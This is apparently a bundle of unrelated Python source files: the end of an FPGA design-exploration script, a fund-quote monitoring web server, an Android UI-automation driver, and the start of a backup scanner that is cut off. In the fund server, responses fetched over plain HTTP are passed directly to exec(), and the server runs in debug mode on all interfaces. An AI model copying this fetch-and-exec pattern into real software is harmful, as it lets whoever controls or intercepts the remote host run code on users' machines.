save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
#Build testbench with random stimuli - if no no functional testbench is provided
if(build_testbench_random_inputs == "on"):
if(os.path.isfile(os.path.join(call_dir, genconf.testbench_template_file))):
tbfile = open(os.path.join(call_dir, genconf.testbench_template_file),'r')
tb_template_content = tbfile.read()
tbfile.close()
print("Tesbench content: \n"+tb_template_content)
for c in factorial_design.configurations:
build_testbench(c, target_dir, tb_template_content)
else:
print("Testbench template file not found: " + os.path.join(call_dir, genconf.testbench_template_file))
#Simulate switching activity (Isim) for workload-dependent (accurate) estimation of power consumption
if(simulate_switching_activity == "on" or only_update_testbench == "on"):
timestart = datetime.datetime.now().replace(microsecond=0)
procdict = recover_statistics(factorial_design.configurations, genconf.statfile)
for i in range(ind_start, ind_end, 1):
procdict[factorial_design.configurations[i].label][2].update('Progress', 'Scheduled')
procdict[factorial_design.configurations[i].label][2].clear(['Fuse_Compile', 'Simulation_ISIM', 'PowerAnalysis'])
upf = True if only_update_testbench == "on" else False
for i in range(ind_start, ind_end, 1):
stat = manager.ProcStatus('Config') #shared proxy-object for process status monitoring
stat.copy(procdict[factorial_design.configurations[i].label][2])
#wait for resources for new process and update statistics
while True:
(active_proc_num, finished_proc_num) = proclist_stat(list(procdict.values()))
globalstatdict['Simulation'].update('Progress', str('%.2f' % (100*float(finished_proc_num)/float(ind_end-ind_start)))+'%')
save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
if active_proc_num < maxproc:
break
time.sleep(5)
globalstatdict['Simulation'].update('Time_Taken', str(datetime.datetime.now().replace(microsecond=0) - timestart)+'$ok')
p = Process(target = simulate_estimate_consumption, args = (factorial_design.configurations[i], target_dir, retry_attempts, upf, stat))
p.start()
procdict[factorial_design.configurations[i].label] = (p, factorial_design.configurations[i], stat)
while True:
(active_proc_num, finished_proc_num) = proclist_stat(list(procdict.values()))
globalstatdict['Simulation'].update('Progress', str('%.2f' % (100*float(finished_proc_num)/float(ind_end-ind_start)))+'%')
save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
if active_proc_num < 1:
break
time.sleep(5)
globalstatdict['Simulation'].update('Time_Taken', str(datetime.datetime.now().replace(microsecond=0) - timestart)+'$ok')
summary = get_report_summary(genconf.log_dir + "/_par.log", factorial_design.configurations[0].trace_report, factorial_design.configurations[0].saif_power_report, factorial_design, implement_default_config)
with open(os.path.join(genconf.tool_log_dir, "summary_power_simulated.csv"), 'w') as summary_file:
summary_file.write(summary.to_csv())
with open(os.path.join(genconf.tool_log_dir, "summary_power_simulated.xml"), 'w') as summary_file:
summary_file.write(summary.to_xml('Configuration'))
globalstatdict['Simulation'].update('Report', '@[CSV@?./Logs/summary_power_simulated.csv]@, @[XML@?./Logs/summary_power_simulated.xml]@$ok')
save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
#build template for SBFI tool
os.chdir(call_dir)
config_content = "<data>"
for c in factorial_design.configurations:
cpi = get_implementation_properties(os.path.join(genconf.design_dir, c.label ,genconf.log_dir + "/_par.log"), os.path.join(genconf.design_dir, c.label , factorial_design.configurations[0].trace_report), os.path.join(genconf.design_dir, c.label , genconf.log_dir + "/estimated_power_" + genconf.top_design_unit + ".pwr"))
config_content += "\n\n\t<config\n\t\twork_dir = \"" + genconf.design_dir + "/"+c.label + "\""
config_content += "\n\t\tlabel = \"" + c.label + "\""
config_content += "\n\t\tcompile_options = \"lib_on kh_off\""
config_content += "\n\t\trun_options = \"kh_off\""
config_content += "\n\t\tclk_period = \"" + str("%.1f" % norm_clk_period(cpi.minimum_period)) + "\""
config_content += "\n\t\tstart_from = \"\""
config_content += "\n\t\tstop_at = \"\""
config_content += "\n\t/>"
config_content += "</data>"
config_pattern_file = open(os.path.join(genconf.tool_log_dir, "config_pattern.xml"), 'w')
config_pattern_file.write(config_content)
config_pattern_file.close()
print("Completed")
|
start_server.py | #!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @Time : 2022/3/14 21:23
# @Author : dodo
# @Version:V 0.1
# @desc : 入口脚本
from gevent import monkey
monkey.patch_all()
import os
import newest_jinzhi_mgr
import peak_valley_mgr
import threading
import requests
import json
import bottle
import valid_funds_db_mgr
from dz_utils.dz_utils import dict_set, write_json_file_breakline, dict_only_get, get_current_time, dict_get, print_2_file, time_str2int, time_int2str, read_json_file
global_funds_gz_infos: dict = {}
global_valid_funds_base_info_dict: dict = {}
# 包含成交量和成交额的场内基金数据
global_inner_funds_advance_info_dict: dict = {}
def jsonpgz(the_fund_gz_info=None):
if not isinstance(the_fund_gz_info, dict):
log_str: str = f"{get_current_time()} jsonpgz_error! the_fund_gz_info:{the_fund_gz_info}"
print_2_file("./log/start_server.log", log_str)
return
the_fund_id: str = the_fund_gz_info.get("fundcode")
base_jsonpgz(the_fund_id, the_fund_gz_info)
def base_jsonpgz(the_fund_id: str, the_fund_gz_info: dict = None):
the_base_info: list = dict_only_get(global_valid_funds_base_info_dict, the_fund_id)
the_fund_name: str = the_base_info[0]
the_fund_type: str = the_base_info[1]
the_fund_stock_rate: float = the_base_info[2]
the_fund_money: float = the_base_info[3]
zcgm = the_base_info[4]
tags_str = the_base_info[5]
select_stock = the_base_info[6]
yield_rate = the_base_info[7]
anti_risk = the_base_info[8]
stability = the_base_info[9]
select_time = the_base_info[10]
hold_share = the_base_info[11]
# the_pingzhongdata_info: dict = read_json_file(f"./pingzhongdata/{the_fund_id}.json")
# Data_ACWorthTrend_list: list = dict_only_get(the_pingzhongdata_info, "Data_ACWorthTrend")
# history_total_jinzhi_list: list = history_total_jinzhi_db_mgr.get_history_total_jinzhi_list(the_fund_id)
if the_fund_gz_info is None:
the_fund_gz_info: dict = {}
dict_set(the_fund_gz_info, "fundcode", the_fund_id)
dict_set(the_fund_gz_info, "name", the_fund_name)
# 没有估值增长率
dict_set(the_fund_gz_info, "gszzl", "0")
dict_set(the_fund_gz_info, "gztime", "~~无即时估值")
dict_set(the_fund_gz_info, "type", the_fund_type)
dict_set(the_fund_gz_info, "stock_rate", the_fund_stock_rate)
dict_set(the_fund_gz_info, "money", the_fund_money)
dict_set(the_fund_gz_info, "tags", tags_str)
dict_set(the_fund_gz_info, "select_stock", select_stock)
dict_set(the_fund_gz_info, "yield_rate", yield_rate)
dict_set(the_fund_gz_info, "anti_risk", anti_risk)
dict_set(the_fund_gz_info, "stability", stability)
dict_set(the_fund_gz_info, "select_time", select_time)
dict_set(the_fund_gz_info, "zcgm", zcgm)
gszzl_str: str = dict_get(the_fund_gz_info, "gszzl", "0")
gszzl_float: float = float(gszzl_str) / 100
# 今日单位净值的增长差额
guzhi_delta: float = 0
dwjz_str: str = dict_only_get(the_fund_gz_info, "dwjz")
if gszzl_float != 0 and (dwjz_str is not None):
dwjz_float: float = float(dwjz_str)
guzhi_delta = dwjz_float * gszzl_float
time_int, total_jingzhi = newest_jinzhi_mgr.get_newest_jinzhi(the_fund_id)
# 20:00-次日9:30 当日净值更新,
# 9:30-20:00 估值更新, 净值未更新
jzrq: str = dict_only_get(the_fund_gz_info, "jzrq")
if jzrq is None:
# 净值日期数据不存在
vp_rate_200, vp_rate_100 = peak_valley_mgr.calc_peak_valley_rate(the_fund_id, float(total_jingzhi) + guzhi_delta)
dict_set(the_fund_gz_info, "vp_rate_200", vp_rate_200)
dict_set(the_fund_gz_info, "vp_rate_100", vp_rate_100)
dict_set(global_funds_gz_infos, the_fund_id, the_fund_gz_info)
return
jzrq_int: int = time_str2int(jzrq, "%Y-%m-%d")
if time_int - jzrq_int > 40000:
vp_rate_200, vp_rate_100 = peak_valley_mgr.calc_peak_valley_rate(the_fund_id, float(total_jingzhi))
log_str: str = f"{get_current_time()} calc_vp {the_fund_id}, time_int:{time_int2str(time_int, '%Y%m%d_%H%M%S')}, total_jingzhi:{total_jingzhi}, the_fund_gz_info:{the_fund_gz_info}"
print_2_file("./log/calc_vp.log", log_str)
else:
vp_rate_200, vp_rate_100 = peak_valley_mgr.calc_peak_valley_rate(the_fund_id, float(total_jingzhi) + guzhi_delta)
dict_set(the_fund_gz_info, "vp_rate_200", vp_rate_200)
dict_set(the_fund_gz_info, "vp_rate_100", vp_rate_100)
dict_set(global_funds_gz_infos, the_fund_id, the_fund_gz_info)
def start_monitor():
global global_valid_funds_base_info_dict
global global_funds_gz_infos
global global_inner_funds_advance_info_dict
global_valid_funds_base_info_dict = valid_funds_db_mgr.get_all_valid_funds_info_dict()
print(f"len(global_valid_funds_dict):{len(global_valid_funds_base_info_dict)}")
# 对global_funds_gz_infos, global_inner_funds_advance_info_dict进行初始化
file_path: str = "json/global_funds_gz_infos.json"
if os.access(file_path, os.F_OK):
global_funds_gz_infos = read_json_file(file_path)
file_path: str = "json/global_inner_funds_advance_info_dict.json"
if os.access(file_path, os.F_OK):
global_inner_funds_advance_info_dict = read_json_file(file_path)
while True:
monitor_once()
write_json_file_breakline("json/global_funds_gz_infos.json", global_funds_gz_infos)
write_json_file_breakline("./json/global_inner_funds_advance_info_dict.json", global_inner_funds_advance_info_dict)
log_str: str = f"{get_current_time()} monitor_once finish"
print_2_file("./log/start_server.log", log_str)
# time.sleep(60 * 60 * 24)
# time.sleep(60)
def refresh_inner_funds_advance_info():
# 使用便捷方法一次性刷新场内基金的数据
url: str = f'http://17.push2.eastmoney.com/api/qt/clist/get?cb=inner_funds_callback&pn=1&pz=160&po=1&np=1&ut=bd1d9ddb04089700cf9c27f6f7426281&fltt=2&invt=2&fid=f5&fs=b:MK0404,b:MK0405,b:MK0406,b:MK0407&fields=f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f12,f13,f14,f15,f16,f17,f18,f20,f21,f23,f24,f25,f22,f11,f62,f128,f136,f115,f152&_=1646113137838.js'
response = requests.get(url=url)
the_text: str = response.text
exec(the_text)
print(f"{get_current_time()}, refresh inner_funds_lof, len_text:{len(the_text)}")
for the_page in [1, 2, 3, 4]:
url: str = f"http://40.push2.eastmoney.com/api/qt/clist/get?cb=inner_funds_callback&pn={the_page}&pz=200&po=0&np=1&ut=bd1d9ddb04089700cf9c27f6f7426281&fltt=2&invt=2&fid=f12&fs=b:MK0021,b:MK0022,b:MK0023,b:MK0024&fields=f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f12,f13,f14,f15,f16,f17,f18,f20,f21,f23,f24,f25,f22,f11,f62,f128,f136,f115,f152&_=1646634598896"
response = requests.get(url=url)
the_text: str = response.text
exec(the_text)
print(f"{get_current_time()}, refresh inner_funds_etf, page_no:{the_page} len_text:{len(the_text)}")
def inner_funds_callback(the_dict: dict):
"""
处理场内基金的相关数据
:param the_dict: the_dict
:return:
"""
the_data: dict = dict_only_get(the_dict, "data")
the_diff_list: list[dict] = dict_only_get(the_data, "diff")
print(f"{get_current_time()}, inner_funds_callback, len_the_diff_list:{len(the_diff_list)}")
for the_info in the_diff_list:
the_fund_id: str = dict_only_get(the_info, "f12")
dict_set(global_inner_funds_advance_info_dict, the_fund_id, the_info)
def refresh_base_time() -> tuple[str, str]:
monitor_the_fund("000001")
monitor_the_fund("000006")
monitor_the_fund("000008")
# 1. 首先确定最新估值日期, 前日日期
the_gz_info_1: dict = dict_only_get(global_funds_gz_infos, "000001")
the_gz_info_6: dict = dict_only_get(global_funds_gz_infos, "000006")
the_gz_info_8: dict = dict_only_get(global_funds_gz_infos, "000008")
jzrq_1: str = dict_only_get(the_gz_info_1, "jzrq")
jzrq_6: str = dict_only_get(the_gz_info_6, "jzrq")
jzrq_8: str = dict_only_get(the_gz_info_8, "jzrq")
jzrq_timestamp_1: int = time_str2int(jzrq_1, "%Y-%m-%d")
jzrq_timestamp_6: int = time_str2int(jzrq_6, "%Y-%m-%d")
jzrq_timestamp_8: int = time_str2int(jzrq_8, "%Y-%m-%d")
max_jzrq_timestamp: int = max(jzrq_timestamp_1, jzrq_timestamp_6, jzrq_timestamp_8)
max_jzrq: str = time_int2str(max_jzrq_timestamp, "%Y-%m-%d")
gztime_1: str = dict_only_get(the_gz_info_1, "gztime")
gztime_6: str = dict_only_get(the_gz_info_6, "gztime")
gztime_8: str = dict_only_get(the_gz_info_8, "gztime")
gztime_timestamp_1: int = time_str2int(gztime_1, "%Y-%m-%d %H:%M")
gztime_timestamp_6: int = time_str2int(gztime_6, "%Y-%m-%d %H:%M")
gztime_timestamp_8: int = time_str2int(gztime_8, "%Y-%m-%d %H:%M")
max_gztime_timestamp: int = max(gztime_timestamp_1, gztime_timestamp_6, gztime_timestamp_8)
max_gztime: str = time_int2str(max_gztime_timestamp, "%Y-%m-%d %H:%M")
return max_jzrq, max_gztime
def monitor_once():
newest_jinzhi_mgr.refresh_all_jinzhi()
max_jzrq, max_gztime = refresh_base_time()
refresh_inner_funds_advance_info()
inner_funds_id_list = global_inner_funds_advance_info_dict.keys()
valid_funds_id_list = global_valid_funds_base_info_dict.keys()
# 优先处理场内基金的相关数据
for inner_fund_id in inner_funds_id_list:
if inner_fund_id in valid_funds_id_list:
jsonpgz_inner_fund(inner_fund_id, max_jzrq, max_gztime)
continue
for the_fund_id in global_valid_funds_base_info_dict:
if the_fund_id in inner_funds_id_list:
continue
try:
monitor_the_fund(the_fund_id)
except Exception as e:
log_str: str = f"{get_current_time()} exception! cur_fund_id:{the_fund_id}, e:{e}"
print_2_file("./log/start_server_exception.log", log_str)
def jsonpgz_inner_fund(the_fund_id: str, max_jzrq: str, max_gztime: str):
# todo 需要给场内基金添加标签, 封闭的基金, 暂停的基金, 也需要打上自动标签
the_fund_base_info_list: list = dict_only_get(global_valid_funds_base_info_dict, the_fund_id)
the_inner_fund_advance_info: dict = dict_only_get(global_inner_funds_advance_info_dict, the_fund_id)
the_name: str = the_fund_base_info_list[0]
# 昨收单位净值
yesterday_jinzhi: float = dict_only_get(the_inner_fund_advance_info, "f18")
# 当前最新价
cur_gz: float = dict_only_get(the_inner_fund_advance_info, "f2")
cur_gz_rate: float = dict_only_get(the_inner_fund_advance_info, "f3")
if cur_gz_rate == "-":
cur_gz_rate = 0
the_fund_gz_info: dict = {}
dict_set(the_fund_gz_info, "fundcode", the_fund_id)
dict_set(the_fund_gz_info, "name", the_name)
dict_set(the_fund_gz_info, "jzrq", max_jzrq)
dict_set(the_fund_gz_info, "dwjz", yesterday_jinzhi)
dict_set(the_fund_gz_info, "gsz", cur_gz)
dict_set(the_fund_gz_info, "gszzl", cur_gz_rate)
dict_set(the_fund_gz_info, "gztime", max_gztime)
base_jsonpgz(the_fund_id, the_fund_gz_info)
# log_str: str = f"{get_current_time()} jsonpgz_inner_fund! cur_fund_id:{the_fund_id}, the_fund_gz_info:{the_fund_gz_info}"
# print_2_file("./log/start_server.log", log_str)
def monitor_the_fund(the_fund_id):
url = f'http://fundgz.1234567.com.cn/js/{the_fund_id}.js'
response = requests.get(url=url)
the_text: str = response.text
if "fundcode" not in the_text:
log_str: str = f"{get_current_time()} jsonpgz_error! cur_fund_id:{the_fund_id}, the_fund_gz_info:{the_text}"
print_2_file("./log/start_server.log", log_str)
base_jsonpgz(the_fund_id)
return
if str.startswith(the_text, "jsonpgz("):
log_str: str = the_text
print_2_file("./log/start_server.log", log_str)
# 该方法过于危险, 应当改用为正则表达式的方法
exec(the_text)
# jsonpgz({"fundcode": "013081", "name": "淇¤瘹涓瘉800鏈夎壊鎸囨暟(LOF)C", "jzrq": "2021-09-14", "dwjz": "2.2340", "gsz": "2.2480", "gszzl": "0.63", "gztime": "2021-09-15 15:00"});
@bottle.route('/getFund', method='GET')
def get_fund():
return json.dumps(global_funds_gz_infos, ensure_ascii=False)
@bottle.route('/editTags', method='GET')
def edit_tags():
# 修改标签
# todo 制作忽略功能, 还有合并功能
fund_id: str = bottle.request.query.fund_id
new_tags_str: str = bottle.request.query.new_tags
the_base_info: list = dict_only_get(global_valid_funds_base_info_dict, fund_id)
if the_base_info is None or new_tags_str is None:
# 参数检验
return f"edit_tags failed, {fund_id}, {new_tags_str}"
old_tags_str: str = the_base_info[5]
the_base_info[5] = new_tags_str
the_fund_gz_info: dict = dict_only_get(global_funds_gz_infos, fund_id)
dict_set(the_fund_gz_info, "tags", new_tags_str)
print(f"{get_current_time()} edit_tags {fund_id} old_tags:{old_tags_str}, new_tags:{new_tags_str}")
valid_funds_db_mgr.update_tags(fund_id, new_tags_str)
return f"edit_tags ok, {fund_id} old_tags:{old_tags_str}, new_tags:{new_tags_str}"
@bottle.route('/static/<filename>')
def server_static(filename):
return bottle.static_file(filename, root="./static/")
def start_server():
# 阻塞方法
bottle.run(host='0.0.0.0', port=8080, debug=True, server='gevent')
if __name__ == "__main__":
threading.Thread(target=start_monitor).start()
start_server()
########################################################################################################################################################
########################################################################################################################################################
def read_fenzu_list(the_id: str):
with open("./json/fenzu.json", "r", encoding="utf-8") as f:
fenzu_data: dict = json.load(f)
zu_obj: dict = fenzu_data.get(the_id)
# 分组暂时通过后台json分组, 前台直接分组的功能暂缓
# 重要的量化指标 最高点与最低点之间指数, 以最低点为0, 最高点为100, 计算当前指数, N天以来最高, M天以来最低, 连续X天上涨/下跌
|
uiautomation.py | # coding=utf-8
__author__ = 'lxn3032'
import os
import requests
import time
import warnings
import atexit
try:
new_airtest_api = True
import airtest.core.api as _____
except ImportError:
new_airtest_api = False
from airtest.core.android.utils.iputils import get_ip_address
from airtest.core.android.ime import YosemiteIme
from hrpc.client import RpcClient
from hrpc.transport.http import HttpTransport
from poco import Poco
from poco.agent import PocoAgent
from poco.sdk.Attributor import Attributor
from poco.utils.hrpc.hierarchy import RemotePocoHierarchy
from poco.drivers.android.utils.installation import install, uninstall
__all__ = ['AndroidUiautomationPoco', 'AndroidUiautomationHelper']
this_dir = os.path.dirname(os.path.realpath(__file__))
PocoServicePackage = 'com.netease.open.pocoservice'
PocoServicePackageTest = 'com.netease.open.pocoservice.test'
class AndroidRpcClient(RpcClient):
def __init__(self, endpoint):
self.endpoint = endpoint
super(AndroidRpcClient, self).__init__(HttpTransport)
def initialize_transport(self):
return HttpTransport(self.endpoint, self)
class AttributorWrapper(Attributor):
"""
部分手机上仍不支持Accessibility.ACTION_SET_TEXT,使用YosemiteIme还是兼容性最好的方案
这个class会hook住set_text,然后改用ime的text方法
"""
def __init__(self, remote, ime):
self.remote = remote
self.ime = ime
def getAttr(self, node, attrName):
return self.remote.getAttr(node, attrName)
def setAttr(self, node, attrName, attrVal):
if attrName == 'text':
self.ime.text(attrVal)
else:
self.remote.setAttr(node, attrName, attrVal)
class AndroidPocoAgent(PocoAgent):
def __init__(self, endpoint, ime):
self.client = AndroidRpcClient(endpoint)
remote_poco = self.client.remote('poco-uiautomation-framework')
dumper = remote_poco.dumper
selector = remote_poco.selector
attributor = AttributorWrapper(remote_poco.attributor, ime)
hierarchy = RemotePocoHierarchy(dumper, selector, attributor)
super(AndroidPocoAgent, self).__init__(hierarchy, remote_poco.inputer, remote_poco.screen, None)
class AndroidUiautomationPoco(Poco):
"""
Poco Android implementation for testing **Android native apps**.
Args:
device (:py:obj:`Device`): :py:obj:`airtest.core.device.Device` instance provided by ``airtest``. leave the
parameter default and the default device will be chosen. more details refer to ``airtest doc``
using_proxy (:py:obj:`bool`): whether use adb forward to connect the Android device or not
force_restart (:py:obj:`bool`): whether always restart the poco-service-demo running on Android device or not
options: see :py:class:`poco.pocofw.Poco`
Examples:
The simplest way to initialize AndroidUiautomationPoco instance and no matter your device network status::
from poco.drivers.android.uiautomation import AndroidUiautomationPoco
poco = AndroidUiautomationPoco()
poco('android:id/title').click()
...
"""
def __init__(self, device=None, using_proxy=True, force_restart=True, **options):
if not device:
try:
# new version
from airtest.core.api import connect_device, device as current_device
if not current_device():
connect_device("Android:///")
except ImportError:
# old version
from airtest.cli.runner import device as current_device
from airtest.core.main import set_serialno
if not current_device():
set_serialno()
self.device = current_device()
else:
self.device = device
self.adb_client = self.device.adb
if using_proxy:
self.device_ip = self.adb_client.host or "127.0.0.1"
else:
if new_airtest_api:
self.device_ip = self.adb_client.get_ip_address()
else:
self.device_ip = get_ip_address(self.adb_client)
# save current top activity (@nullable)
current_top_activity_package = self.device.get_top_activity_name()
if current_top_activity_package is not None:
current_top_activity_package = current_top_activity_package.split('/')[0]
# install ime
if new_airtest_api:
self.ime = YosemiteIme(self.adb_client)
else:
self.ime = YosemiteIme(self.device)
self.ime.start()
# install
self._instrument_proc = None
self._install_service()
# forward
if using_proxy:
p0, _ = self.adb_client.setup_forward("tcp:10080")
p1, _ = self.adb_client.setup_forward("tcp:10081")
else:
p0 = 10080
p1 = 10081
# start
if self._is_running('com.github.uiautomator'):
warnings.warn('{} should not run together with "uiautomator". "uiautomator" will be killed.'
.format(self.__class__.__name__))
self.adb_client.shell(['am', 'force-stop', 'com.github.uiautomator'])
ready = self._start_instrument(p0, force_restart=force_restart)
if not ready:
# 启动失败则需要卸载再重启,instrument的奇怪之处
uninstall(self.adb_client, PocoServicePackage)
self._install_service()
ready = self._start_instrument(p0)
if current_top_activity_package is not None:
current_top_activity2 = self.device.get_top_activity_name()
if current_top_activity2 is None or current_top_activity_package not in current_top_activity2:
self.device.start_app(current_top_activity_package, activity=True)
if not ready:
raise RuntimeError("unable to launch AndroidUiautomationPoco")
endpoint = "http://{}:{}".format(self.device_ip, p1)
agent = AndroidPocoAgent(endpoint, self.ime)
super(AndroidUiautomationPoco, self).__init__(agent, **options)
def _install_service(self):
updated = install(self.adb_client, os.path.join(this_dir, 'lib', 'pocoservice-debug.apk'))
install(self.adb_client, os.path.join(this_dir, 'lib', 'pocoservice-debug-androidTest.apk'), updated)
return updated
def _is_running(self, package_name):
processes = self.adb_client.shell(['ps']).splitlines()
for ps in processes:
ps = ps.strip()
if ps.endswith(package_name):
return True
return False
# def _keep_running_instrumentation(self):
# def loop():
# while True:
# proc = self.adb_client.shell([
# 'am', 'instrument', '-w', '-e', 'class',
# '{}.InstrumentedTestAsLauncher#launch'.format(PocoServicePackage),
# '{}.test/android.support.test.runner.AndroidJUnitRunner'.format(PocoServicePackage)],
# not_wait=True)
# stdout, stderr = proc.communicate()
# print(stdout)
# print(stderr)
# time.sleep(1)
# t = threading.Thread(target=loop)
# t.daemon = True
# t.start()
def _start_instrument(self, port_to_ping, force_restart=True):
if not force_restart:
try:
requests.get('http://{}:{}'.format(self.device_ip, port_to_ping), timeout=10)
except:
pass
else:
return True
if self._instrument_proc is not None:
self._instrument_proc.kill()
self._instrument_proc = None
ready = False
self.adb_client.shell(['am', 'force-stop', PocoServicePackage])
# 启动instrument之前,先把主类activity启动起来,不然instrumentation可能失败
self.adb_client.shell('am start -n {}/.TestActivity'.format(PocoServicePackage))
instrumentation_cmd = [
'am', 'instrument', '-w', '-e', 'debug', 'false', '-e', 'class',
'{}.InstrumentedTestAsLauncher'.format(PocoServicePackage),
'{}.test/android.support.test.runner.AndroidJUnitRunner'.format(PocoServicePackage)]
if new_airtest_api:
self._instrument_proc = self.adb_client.start_shell(instrumentation_cmd)
else:
self._instrument_proc = self.adb_client.shell(instrumentation_cmd, not_wait=True)
atexit.register(self._instrument_proc.kill)
time.sleep(2)
for i in range(10):
try:
requests.get('http://{}:{}'.format(self.device_ip, port_to_ping), timeout=10)
ready = True
break
except requests.exceptions.Timeout:
break
except requests.exceptions.ConnectionError:
time.sleep(1)
print("still waiting for uiautomation ready.")
continue
return ready
def on_pre_action(self, action, proxy, args):
# airteset log用
try:
from airtest.core.api import snapshot
except ImportError:
# 兼容旧airtest
from airtest.core.main import snapshot
snapshot(msg=unicode(proxy))
class AndroidUiautomationHelper(object):
_nuis = {}
@classmethod
def get_instance(cls, device):
"""
This is only a slot to store and get already initialized poco instance rather than initializing again. You can
simply pass the ``current device instance`` provided by ``airtest`` to get the AndroidUiautomationPoco instance.
If no such AndroidUiautomationPoco instance, a new instance will be created and stored.
Args:
device (:py:obj:`airtest.core.device.Device`): more details refer to ``airtest doc``
Returns:
poco instance
"""
if cls._nuis.get(device) is None:
cls._nuis[device] = AndroidUiautomationPoco(device)
return cls._nuis[device]
|
scanbackup_20210224145802.py | """
1、文件到这里
一份给ES 一份给自己
新增ES旧索引入库
在继承原有功能的基础上
重构备份程序,按照数据内的
国家-当前时间(年-月-日)
如果按照数据内的时间的话也会面临和按国家端口备份的问题
不用再分端口了
create by judy 20201217
"""
from pathlib import Path
import threading
import json
from queue import Queue
import traceback
import datetime
import time
from shutil import copyfile
import zipfile
import shutil
class ScanBackUP(object):
def __init__(self) -> None:
# super().__init__()
# 所有数据先到这
self._input = None
# 所有数据先复制一份到这, 这个是程序不用管的文件夹
self._esinput = None
# 将要备份的数据放到这, 要处理的数据全部放在这里
self._dbu_input = None
self._databack = None
self._zipdata: Path = None
self._zip_size = None
# 备份线程默认为一个,可以在配置里面更改重启
self.backup_thread = 1
self.zip_thread = 1
# 增加一个是否拷贝到ES的功能
self.copy_esinput_enable = True
self._tmp = Path('./tmp')
self._tmp.mkdir(exist_ok=True)
# 文件是否需要拷贝一份到旧索引
self._old_esinput = None
self.config_path = Path(r'./config_path.json')
try:
self._init_cpinfo()
except:
raise Exception(
f"初始化配置参数失败,请检查配置文件\nerror:{traceback.format_exc()}")
# 需要用到的参数
# 文件锁,同一时间只允许一个线程操作文件
self.__file_locker = threading.Lock()
self.__scan_file_locker = threading.Lock()
self._zipfile_locker = threading.Lock()
# 因为压缩可能处理的时间比较长,所以需要增加一个正在压缩的字典
self._zip_dealing = {}
# 根据后缀分配的需要处理的队列,目前只有iscan
self.iscan_task_queue = Queue()
self._zip_queue = Queue()
self.iscan_suffix = '.iscan_search'
# try:
# self._restore_existdata()
# except:
# raise Exception(
# "There's something wrong with restoring the environment")
def _init_cpinfo(self):
"""
初始化配置文件中的路径和参数
:return:
"""
conf_str = self.config_path.read_text(encoding='utf-8')
conf_dict = json.loads(conf_str)
_input = conf_dict.get('data_input')
if not isinstance(_input, str):
raise Exception("Unknown data_input path")
self._input = Path(_input)
self._input.mkdir(exist_ok=True)
print(
f"Start scan data file, input_file_path:{self._input.as_posix()}")
_esinput = conf_dict.get('es_input')
if not isinstance(_esinput, str):
raise Exception("Unknown es_input path")
self._esinput = Path(_esinput)
self._esinput.mkdir(exist_ok=True)
print(f"Save data to ES, es_path:{self._esinput.as_posix()}")
_dbuinput = conf_dict.get('backup_input')
if not isinstance(_dbuinput, str):
raise Exception("Unkown backup_input path")
self._dbu_input = Path(_dbuinput)
self._dbu_input.mkdir(exist_ok=True)
print(f"Data backup process path:{self._dbu_input.as_posix()}")
_databack = conf_dict.get('databackup')
if not isinstance(_databack, str):
raise Exception("Unknown databackup path")
self._databack = Path(_databack)
self._databack.mkdir(exist_ok=True)
print(f"Data save backup path:{self._databack.as_posix()}")
_zipdata = conf_dict.get('zipdata')
if not isinstance(_zipdata, str):
raise Exception("Unkown zipdata path")
self._zipdata = Path(_zipdata)
self._zipdata.mkdir(exist_ok=True)
print(f"Zipdata save path:{self._zipdata.as_posix()}")
_zip_size = conf_dict.get('zip_size')
if not isinstance(_zip_size, int):
raise Exception("Unknown zip_size type")
# 将单位换算成B
self._zip_size = _zip_size * 1024 * 1024
print(f"Zip data size:{_zip_size}MB")
backupthread = conf_dict.get('backup_thread')
if not isinstance(backupthread, int):
raise Exception("Unknown backupthread type")
self.backup_thread = backupthread
zipthread = conf_dict.get('zipdata_thread')
if not isinstance(zipthread, int):
raise Exception("Unknown zipthread type")
self.zip_thread = zipthread
time_limit = conf_dict.get('time_limit')
if not isinstance(time_limit, int):
raise Exception("Unknown time_limit type")
self._backup_interval_time = time_limit * 24 * 60 * 60
print(f"Zip data time expired after {time_limit} days")
# 默认拷贝到ES的功能为开放
copy_esinput_enable = conf_dict.get('copy_to_esinput', True)
self.copy_esinput_enable = copy_esinput_enable
# 拷贝旧索引数据
_old_esinput = conf_dict.get('es_input')
if not isinstance(_esinput, str):
raise Exception("Unknown es_input path")
self._esinput = Path(_esinput)
self._esinput.mkdir(exist_ok=True)
print(f"Save data to ES, es_path:{self._esinput.as_posix()}")
def scan_file(self):
"""
扫描输入的文件
根据文件后缀进行分类,将文件放入待处理队列
:return:
"""
while True:
try:
for file in self._input.iterdir():
name = file.name
# 全部移动到tmp目录下去
tmpname = self._tmp / name
# file.replace(tmpname)
with self.__scan_file_locker:
# 这个文件得尽快移动到tmp文件夹,不然下次扫描又会扫描到它就会出问题
shutil.move(file.as_posix(), tmpname.as_posix())
try:
if tmpname.suffix == self.iscan_suffix:
# 只进行复制操作
# source: Path = self._input / name
target: Path = self._dbu_input / name
copyfile(tmpname.as_posix(), target.as_posix())
self.iscan_task_queue.put(target)
print(
f"Backup iscan_search data, filename:{file.as_posix()}")
except:
print(
f'Scan list file error, err:{traceback.format_exc()}')
finally:
# 最后无论如何都需要将文件输出到esinput
if self.copy_esinput_enable:
outname = self._esinput / name
tmpname.replace(outname)
# 一般来说是不会有文件存在的,但是意外不可避免嘛, 所以这里做一个判定,如果还存在文件就删了
if tmpname.exists():
tmpname.unlink()
except:
print(f'Scan task file error, err:{traceback.format_exc()}')
continue
finally:
print("There is no scan data to back up")
time.sleep(0.5)
def _process_file(self, tmpfile: Path):
"""
读取文件里面的数据打开一下,获取到信息后再关上
"""
with tmpfile.open('r', encoding='utf-8') as fp:
j_text = fp.read()
d_text = json.loads(j_text)
# scan_time = d_text.get('time')
# if scan_time is None:
# scan_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
try:
country = d_text.get('geoinfo').get('country').get('code')
except:
country = 'UNKNOWN'
return country
def back_file(self):
"""
开始备份数据,先保存到文件夹
当这个文件夹到达一定大小然后压缩保存
:return:
"""
got = False
while True:
got = False
